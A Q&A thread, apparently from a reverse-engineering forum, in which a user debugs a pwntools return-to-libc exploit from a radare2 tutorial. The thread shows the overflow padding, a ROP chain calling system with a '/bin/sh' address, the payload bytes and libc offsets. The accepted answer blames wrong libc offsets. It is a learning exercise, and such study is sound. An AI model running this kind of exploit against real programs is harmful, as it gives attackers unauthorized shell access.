# Pwntools shows, "Got EOF while reading in interactive"?

Tags: pwntools

When I run `pwntools`, I'm getting

```
[+] Here comes the shell!
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
```

Why is it getting `EOF`? Where should I start looking for the problem, currently my second payload is

```
# Build 2nd payload
payload2  =  b'A'*140
ropchain2 =  p32(system_addr)
ropchain2 += p32(exit_addr)
# Optional: Fix disallowed character by scanf by using p32(binsh_addr+5)
#           Thus you'll execute system("sh")
ropchain2 += p32(binsh_addr) 

payload2 = payload2 + ropchain2            
p.sendline(payload2)                       

log.success("Here comes the shell!")       

p.clean()                                  
p.interactive()
```

This is adapted from the [Megabeets example](https://www.megabeets.net/a-journey-into-radare-2-part-2/) with the [modification given here](https://reverseengineering.stackexchange.com/a/19778/22669)

If I `print(payload2)`, I get

```
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\xe2\xdd\xf7\xd0\x13\xdd\xf7\xcf\xf0\xf1\xf7'
```

Which seems correct. The values I used to generate the payload are,

```
# Addresses                        
puts_plt    = 0x08048390           
puts_got    = 0x0804a014           
entry_point = 0x080483d0           

# Offsets                          
offset_puts       = 0x00067b40     
offset_system     = 0x0003d200     
offset_exit       = 0x000303d0     
offset_str_bin_sh = 0x17e0cf
```

Answer (score 1, accepted):

Alright. So the issue here was I think that Radare was addressing libc based on a version on disk. And, the version in memory was different.

Anyway, I **restarted** the computer and redid the offset math and it worked!